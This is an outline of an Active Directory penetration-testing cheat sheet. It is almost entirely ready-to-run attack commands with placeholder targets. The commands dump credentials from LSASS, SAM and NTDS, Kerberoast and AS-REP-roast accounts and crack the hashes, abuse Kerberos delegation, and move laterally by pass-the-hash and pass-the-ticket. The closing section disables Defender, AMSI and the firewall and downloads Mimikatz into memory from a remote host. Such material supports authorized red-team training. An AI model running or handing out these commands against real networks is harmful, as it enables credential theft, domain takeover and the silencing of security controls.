1. Designed by: Youssef Saeed
  2. @y0u553f5433d
  3. Icons
    1. PowerView
    2. Noisy
    3. Mimikatz
    4. Linux
    5. Rubeus
  4. Dumping Credentials
    1. Tools
      1. mimikatz
        1. mimikatz.exe
        2. Invoke-Mimikatz.ps1
        3. SharpKatz.exe
        4. pypykatz.exe
    2. Creds in memory (LSASS)
      1. MimiKatz
        1. Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
      2. CrackMapExec
        1. crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
      3. procdump
        1. Get-Process -Name LSASS
        2. .\procdump.exe -ma <ProcNum> lsass.dmp
      4. lsassy
        1. lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
    3. Local Creds (SAM)
      1. MimiKatz
        1. Invoke-Mimikatz -Command '"lsadump::sam"'
      2. CrackMapExec
        1. crackmapexec smb <IP> -u <USER> -p <PASS> --sam
      3. SecretDump
        1. reg save HKLM\sam sam
        2. reg save HKLM\system system
        3. reg save HKLM\security security
        4. impacket-secretsdump -sam sam -security security -system system LOCAL
    4. Domain Creds (ntds)
      1. MimiKatz
        1. Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain.full> /all"'
      2. CrackMapExec
        1. crackmapexec smb <IP> -u <USER> -p <PASS> --ntds
      3. SecretDump
        1. impacket-secretsdump <domain>/<USER>:<PASS>@<IP>
  5. Lateral Movement
    1. Kerberoasting
      1. Found SPN
        1. Extract Hashes
          1. specific account
            1. Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
            2. Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            3. impacket-GetUserSPNs -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
          2. all accounts
            1. Invoke-Kerberoast.ps1
              1. Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            2. Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
            3. Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
            4. crackmapexec ldap <DC-IP> -u <USER> -p <PASS> --kerberoasting hashes.txt
            5. impacket-GetUserSPNs -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
          3. From memory to disk
            1. kerberos::list /export
        2. Cracking Hashes
          1. John
            1. john --wordlist=<wordlist path> hashes.txt
          2. Hashcat
            1. hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
        3. Remove the port number from the hashes (if present) before cracking
      2. Set SPN
        1. Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
    2. ASREPRoast
      1. Dumping Hashes
        1. specific account
          1. ASREPRoast.ps1
          2. Get-ASREPHash -UserName <USER> -Verbose
        2. all accounts
          1. Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
          2. crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
          3. GetNPUsers
            1. with Creds
              1. impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
            2. with users
              1. impacket-GetNPUsers -request -dc-ip <IP> -usersfile users.txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
      2. Cracking Hashes
        1. John
          1. john --wordlist=<wordlist path> hashes.txt
        2. Hashcat
          1. hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
    3. Kerberos Delegation
      1. Unconstrained Delegation
        1. Basic
          1. Dumping Tickets
            1. Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
          2. Using Tickets
            1. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
        2. Using Exploits
          1. Setup Ticket monitoring
            1. Rubeus.exe monitor /interval:5 /nowrap
          2. Running Exploit
            1. Printer Bug
              1. .\MS-RPRN.exe \\dc.domain.com \\VulnMachine.domain.com
            2. PetitPotam
              1. .\PetitPotam.exe <VulnPC> <DC>
          3. Using Tickets
            1. Rubeus.exe ptt /ticket:<base64 Ticket from monitoring>
      2. Constrained Delegation
        1. Have User's hash
          1. Using Mimi and Kekeo
            1. Request TGT
              1. kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
            2. Request TGS
              1. kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs>/<PC.Domain.com>
            3. Inject the ticket
              1. Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
          2. Using Rubeus
            1. Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt
        2. Have Computer's hash
          1. Using Mimi and Kekeo
            1. Request TGT
              1. kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
            2. Request TGS
              1. kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs>/<PC.Domain.com>
            3. Inject the ticket
              1. Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
          2. Using Rubeus
            1. Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/PC.domain.com /ptt
      3. Resource Based
        1. Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount <YourPWNedHost$>
        2. Rubeus.exe s4u /user:<Pwned PC>$ /aes256:<PC$ aes256> /msdsspn:<SVC>/<SVCMachine> /impersonateuser:administrator /ptt
  6. Enumeration
    1. BloodHound Enum
      1. BloodHound
        1. SharpHound.ps1
          1. Invoke-BloodHound -CollectionMethod All
          2. Invoke-BloodHound -CollectionMethod All -ExcludeDC
    2. PowerView Enum
    3. Advanced Domain Enumeration
      1. Local Admin Access
        1. Find-LocalAdminAccess -Verbose
        2. Find-WMILocalAdminAccess.ps1
        3. Find-PSRemotingLocalAdminAccess.ps1
      2. Password Hardening
        1. $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
      3. Kerberoasting
        1. Find SPNs
          1. Get-DomainUser -SPN | select samaccountname,serviceprincipalname
          2. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
          3. Rubeus.exe kerberoast /stats
        2. Set SPNs
          1. Make sure the user has no SPN
          2. Get-DomainUser -Identity <USER> | select serviceprincipalname
          3. Found ?
        3. Found ?
      4. ASREPRoast
        1. Get-DomainUser -PreauthNotRequired -Verbose
        2. impacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
        3. ASREPRoast.ps1
          1. Invoke-ASREPRoast -Verbose
      5. Kerberos Delegation
        1. Unconstrained
          1. Get-DomainComputer -Unconstrained | select name,logoncount,description,operatingsystem
          2. Found ?
        2. Constrained
          1. Users Enum
          2. Get-DomainUser -TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl
          3. Computers Enum
          4. Get-DomainComputer -TrustedToAuth | select name,logoncount,description,operatingsystem,msds-allowedtodelegateto | fl
        3. Resource Based
          1. Find-InterestingDomainACL | ?{$_.identityreferencename -match '<USER>'}
          2. Found ?
        4. Found ?
      6. Found ?
      7. Found ?
    4. Important
  7. Require DA Privs
  8. Accessing
    1. Have Legal Access ?
      1. winrs
        1. winrs -r:<HOSTNAME> cmd
      2. PsExec
        1. .\PsExec.exe \\<HOSTNAME> cmd
      3. PS-Script
        1. Interactive
          1. $sess = New-PSSession -ComputerName <HOST>
          2. Enter-PSSession -Session $sess
      4. Script Block
        1. $sess = New-PSSession -ComputerName <HOST>
        2. Invoke-Command -Session $sess -ScriptBlock {ipconfig;whoami;pwd}
      5. WSManWinRM
        1. Invoke-WSManWinRM -hostname <HOST> -command cmd
    2. Have Password ?
      1. winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
      2. .\PsExec.exe -u <Domain>/<USER> -p <PASS> \\<HOSTNAME> cmd
      3. impacket-psexec <Domain>/<USER>:<PASS>@<IP>
      4. WSManWinRM
        1. Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>
      5. evil-winrm -i <IP> -u <Domain>/<USER> -p <PASS>
      6. RDP Access
        1. rdesktop -a 16 <IP> -u <DOMAIN\USER> -p <PASS>
        2. xfreerdp /v:IP /u:"<USER>" /p:<PASS>
    3. Pass The Hash (PTH)
      1. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Domain> /ntlm:<NTLM> /run:powershell.exe"'
      2. impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
      3. evil-winrm -u <username> -H <Hash> -i <IP>
      4. pth-winexe -U <Domain>/<User>%<LM>:<NT> //<IP> cmd
      5. Impacket For Win
        1. .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
      6. Invoke-TheHash
        1. Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Domain> -Username <USER> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
      7. Require RDP
    4. OverPass The Hash (OPTH) OR Pass The Key (PTK)
      1. Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
        1. .\PsExec.exe -accepteula \\<HOST> cmd
        2. winrs -r:<HOST> cmd
      2. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
      3. Impacket
        1. impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
        2. export KRB5CCNAME=$(pwd)/<USER>.ccache
        3. impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
    5. Pass The Ticket (PTT)
      1. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
      2. Rubeus.exe ptt /ticket:<base64 Ticket>
      3. Access
        1. .\PsExec.exe -accepteula \\<HOST> cmd
        2. winrs -r:<HOST> cmd
  9. Gained Access
    1. Have Reverse Shell?
      1. Enable PS-Remoting
        1. Powershell -ep bypass Enable-PSRemoting -force
      2. Enable RDP
        1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    2. Security Bypass
      1. PowerShell
        1. Current Language Mode
          1. $ExecutionContext.SessionState.LanguageMode
        2. Execution Policy Bypass
          1. powershell -ExecutionPolicy bypass
          2. powershell -c <cmd>
          3. powershell -encodedcommand <Base64Cmd>
          4. $env:PSExecutionPolicyPreference="bypass"
          5. Bypassed ?
      2. AMSI
        1. AMSI Bypass PowerShell Command
        2. Invisi-Shell
          1. If Administrator Access
          2. RunWithPathAsAdmin.bat
          3. If Not Administrator Access
          4. RunWithRegistryNonAdmin.bat
    3. Importing your modules
      1. Import Local file
        1. Import-Module .\PowerView.ps1
        2. . .\PowerUp.ps1
      2. Import in memory
        1. powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')"
    4. Stop Security Products
      1. Defender
        1. Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
        2. Set-MpPreference -DisableIOAVProtection $true
        3. Disable AMSI
          1. Set-MpPreference -DisableScriptScanning 1
      2. Firewall
        1. netsh firewall set opmode disable
        2. netsh Advfirewall set allprofiles state off